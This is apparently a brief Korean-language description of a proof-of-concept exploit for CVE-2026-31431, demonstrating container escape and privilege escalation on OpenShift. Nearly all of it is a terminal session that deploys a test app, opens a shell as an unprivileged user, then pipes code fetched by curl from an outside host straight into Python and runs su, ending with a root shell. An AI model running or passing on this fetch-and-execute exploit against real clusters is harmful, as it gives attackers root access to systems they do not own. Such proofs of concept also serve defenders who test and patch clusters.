
CVE-2026-31431에 대한 개념 증명 익스플로잇으로, OpenShift 환경에서 컨테이너 탈출 및 권한 상승을 시연합니다.
# oc new-app -n default https://github.com/gmeghnag/TEST-CVE-2026-31431
# oc rsh -n default deployment/test-cve-2026-31431
sh-5.1$ id
uid=1001(1001) gid=0(root) groups=0(root)
sh-5.1$ curl -s https://copy.fail/exp | python3.12 && su
[root@test-cve-2026-31431-78f6d9cc97-n7d5j /]# id
uid=0(root) gid=0(root) groups=0(root)